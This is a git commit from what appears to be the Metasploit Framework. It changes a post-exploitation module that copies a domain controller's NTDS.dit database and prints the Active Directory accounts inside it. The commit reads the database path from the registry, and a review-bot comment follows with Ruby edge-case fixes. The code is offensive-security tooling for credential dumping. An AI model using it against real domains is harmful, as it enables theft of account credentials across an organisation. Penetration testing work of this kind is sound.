check registry for ntds location

check the registry for the location of the ntds.dit
file

MSP-12867
bug/bundler_fix
David Maloney 2015-07-02 14:07:47 -05:00
parent 42daf4d38b
commit 89d283da09
No known key found for this signature in database
GPG Key ID: DEDBA9DC3A913DB2
1 changed files with 9 additions and 6 deletions


@ -36,7 +36,7 @@ class Metasploit3 < Msf::Post
unless ntds_file.nil? unless ntds_file.nil?
print_status "Repairing NTDS database after copy..." print_status "Repairing NTDS database after copy..."
print_status repair_ntds(ntds_file) print_status repair_ntds(ntds_file)
realm = domain_name realm = sysinfo["Domain"]
ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file) ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file)
ntds_parser.each_account do |ad_account| ntds_parser.each_account do |ad_account|
print_good ad_account.to_s print_good ad_account.to_s
@ -67,13 +67,16 @@ class Metasploit3 < Msf::Post
database_file_path database_file_path
end end
def domain_name def is_domain_controller?
result = cmd_exec('cmd.exe', '/c systeminfo | findstr /B /C:"Domain"') if ntds_location
result.gsub!(/Domain:\s+/,'') file_exist?("#{ntds_location}\\ntds.dit")
else
false
end
end end
def is_domain_controller? def ntds_location
file_exist?('%SystemDrive%\Windows\ntds\ntds.dit') @ntds_location ||= registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\services\\NTDS\\Parameters\\","DSA Working Directory")
end end
def ntdsutil_method def ntdsutil_method
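Review bot: In `ntds_location` the `||=` memoization never caches a nil result, so when `registry_getvaldata` finds no value (presumably the case on a host that is not a domain controller) each call to `is_domain_controller?` repeats the registry query. The `if ntds_location` test in `is_domain_controller?` also lets an empty string through, since Ruby treats `""` as truthy, and the existence check then runs against `\ntds.dit`. A guard such as `return false if ntds_location.to_s.empty?` ahead of the `file_exist?` call covers both nil and empty, and `return @ntds_location if defined?(@ntds_location)` as the first line of `ntds_location` caches a miss as well. A one-line comment on `ntds_location` saying what it returns when the value is missing would help the next reader.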